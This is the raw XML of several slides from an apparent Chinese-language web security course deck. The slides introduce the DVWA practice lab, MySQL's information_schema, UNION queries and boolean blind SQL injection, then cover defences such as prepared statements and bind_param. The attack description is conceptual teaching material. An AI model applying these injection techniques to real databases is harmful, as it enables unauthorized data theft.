              <a:t>DVWA </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>www.sohu.com</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>/a/444353882_653604</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>DVWA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>DamnVulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> Web Application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>是用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>PHP+MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>编写的一套用于常规</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>漏洞教学和检测的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>脆弱性测试程序，它包含了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>注入、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>等常见的一些安全漏洞。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="191919"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>其主要目的是帮助安全专业人员在合法的环境下测试他们的技术和工具，也可以帮助开发人员更好地理解如何加固他们开发的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>系统。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="191919"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>同时在教学领域还能帮助师生共同探讨学习</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>应用安全知识，其官方网址为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>www.dvwa.co.uk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="191919"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="191919"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Bilibili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>www.bilibili.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/read/cv4427788/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="191919"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>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855827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https://blog.csdn.net/han0373/article/details/79181045</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661968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p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50180" name="日期占位符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buFontTx/>
            </a:pPr>
            <a:fld id="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2023/11/13</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50181" name="灯片编号占位符 4"/>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buFontTx/>
            </a:pPr>
            <a:fld id="{9A0DB2DC-4C9A-4742-B13C-FB6460FD3503}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"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p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Union</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以链接两个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的语句</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52228" name="日期占位符 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3886200" y="0"/>
            <a:ext cx="2971800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="r" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
            </a:pPr>
            <a:fld id="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2023/11/13</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52229" name="灯片编号占位符 4"/>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buFontTx/>
            </a:pPr>
            <a:fld id="{9A0DB2DC-4C9A-4742-B13C-FB6460FD3503}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"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MySqL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中自带四个系统库分别是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>performance_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>sys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后面的例子以</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>为主，他有哪些表是定义了这个库的表、列信息的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479640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数据库常用函数</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 博客园二、聚合函数(常用于group by从句的select查询中)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>avg(col)返回指定列的平均值</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>count(col)返回指定列中非null值的个数</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>min(col)返回指定列的最小值</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>max(col)返回指定列的最大值</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>sum(col)返回指定列的所有值之和</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>group_concat(col) 返回由属于一组的列值连接组合而成的结果</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468254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适用场景：没有数据回显，条件正确有结果，错误没有结果</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用方式：构造判断条件（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>），逐个猜测（盲猜）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757447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85849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https://www.cnblogs.com/askta0/p/9201840.html#/c/subject/p/9201840.html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https://www.cnblogs.com/askta0/p/9201840.html#/c/subject/p/9201840.html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如何防御：过滤（限制长度）、预编译（参数话）、转义、禁用某些参数、防火墙、黑名单</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4205938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https://www.zhihu.com/question/43581628/answer/2253584841</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据库预编译能够绝对避免数据变成代码被执行，时刻将数据和所要执行的代码隔离开来。通过在SQL语句中放置占位符来，然后将带有占位符的SQL语句传给数据库编译，执行的时候才将用户输入的数据作为执行的参数传给用户这一方法，使得其能够拥有防止SQL注入攻击的能力。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>pstmt = conn.prepareStatement（sql）是执行SQL语句的一个接口。但是执行前会对SQL语句进行预编译的操作，然后就开始执行SQL语句，并把结果赋值给pstmt。conn的意思是一个数据库连接。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>PreparedStatement是Statement的子接口，表示预编译的 SQL 语句的对象，SQL 语句被预编译并存储在PreparedStatement 对象中。然后可以使用此对象多次高效地执行该语句。如果有参数的话还需要添加输入的参数。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>bind_param("sss", firstname,lastname, $email);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1. 该函数绑定了 SQL 的参数，且告诉数据库参数的值。 "sss" 参数列处理其余参数的数据类型。s 字符告诉数据库该参数为字符串。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>参数有以下四种类型:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>i - integer（整型）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>d - double（双精度浮点型）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>s - string（字符串）</a:t>
            </a:r>
